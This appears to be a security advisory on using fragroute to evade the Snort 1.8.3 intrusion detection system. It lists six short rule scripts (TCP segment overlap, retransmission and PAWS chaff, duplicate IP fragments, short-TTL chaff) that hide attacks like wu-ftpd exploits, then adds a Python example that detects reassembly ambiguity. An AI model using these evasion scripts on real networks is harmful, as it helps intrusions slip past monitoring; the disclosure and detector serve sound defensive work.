Fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998.
It features a simple rule set language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior.
The tool can be used to blind Snort into not detecting the latest wu-ftpd exploits when fragroute is executed with the "tcp_seg 1 new" option turned on. The following is a list of fragroute scripts that can be used to blind Snort into not detecting attacks.
Credit:
The information has been provided by 0xcafebabe.
Working Attacks against snort-1.8.3:
1. Older TCP retransmission chaff (Snort's TCP segment reassembly seems to always favor newer data, even for properly sequenced received data):
tcp_seg 1
tcp_chaff rexmit
order random
2. Forward TCP segmentation overlap, favoring newer data (both Windows and Unix operate this way, in contrast to Ptacek and Newsham's results):
tcp_seg 1 new
3. Chaff TCP segments with older TCP timestamp options forcing PAWS elimination:
tcp_seg 1
tcp_chaff paws
order random
4. Older IP fragment duplicates (Snort's IP fragment reassembly seems to always favor newer data, even for properly sequenced received data):
ip_frag 8
ip_chaff dup
order random
5. IP duplicate fragment chaff with bad options:
ip_frag 8
ip_chaff opt
order random
6. Either TCP or IP chaffing with short TTLs (that expire before reaching the end host, but pass by the monitor):
IP variant:
ip_frag 8
ip_ttl 11
ip_chaff 10
order random
TCP variant:
tcp_seg 1
ip_ttl 11
tcp_chaff 10
order random
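Seen from the monitor's side, every script above works because the sensor silently picks one reassembly policy (newer data wins) and discards nothing. The following is an added example, not code from the advisory, fragroute or Snort: it models a TCP stream as a list of segments, reassembles it under both the "favor newer" and "favor older" policies, and raises an alert whenever the two disagree or a segment's TTL is too low to reach the host. The Segment model, the hops_to_target value and the sample bytes are constructed assumptions.

```python
from dataclasses import dataclass

@dataclass
class Segment:
    seq: int    # TCP sequence number of the first byte
    data: bytes
    ttl: int    # IP TTL as observed by the monitor

def reassemble(segments, favor_new):
    """Byte-wise stream reassembly. favor_new=True mirrors the policy the
    advisory attributes to Snort 1.8.3 (later data overwrites earlier data);
    favor_new=False keeps the first-seen byte at every offset."""
    stream = {}
    for seg in segments:
        for i, byte in enumerate(seg.data):
            off = seg.seq + i
            if favor_new or off not in stream:
                stream[off] = byte
    if not stream:
        return b""
    lo, hi = min(stream), max(stream)
    return bytes(stream.get(off, 0) for off in range(lo, hi + 1))  # 0 fills holes

def find_evasion_indicators(segments, hops_to_target):
    """Return alerts a monitor can raise instead of silently choosing a policy.
    hops_to_target is assumed known to the sensor (e.g. from configuration);
    chaff with a TTL below it would never reach the end host."""
    alerts = []
    chaff = [s for s in segments if s.ttl < hops_to_target]
    if chaff:
        alerts.append(f"{len(chaff)} segment(s) with TTL too low to reach the target (chaff)")
    live = [s for s in segments if s.ttl >= hops_to_target]
    if reassemble(live, favor_new=True) != reassemble(live, favor_new=False):
        alerts.append("overlapping segments carry conflicting data; reassembly is ambiguous")
    return alerts

if __name__ == "__main__":
    # Constructed sample: a forward overlap in the style of attack 2, plus one
    # short-TTL chaff segment in the style of attack 6.
    sample = [Segment(0, b"ABCD", 64), Segment(2, b"xyEF", 64), Segment(2, b"zz", 3)]
    for alert in find_evasion_indicators(sample, hops_to_target=10):
        print("ALERT:", alert)
```

A sensor that alerts on such ambiguities (or that learns the target's real reassembly policy) closes the gap the scripts rely on, rather than guessing which copy of the data the host will accept.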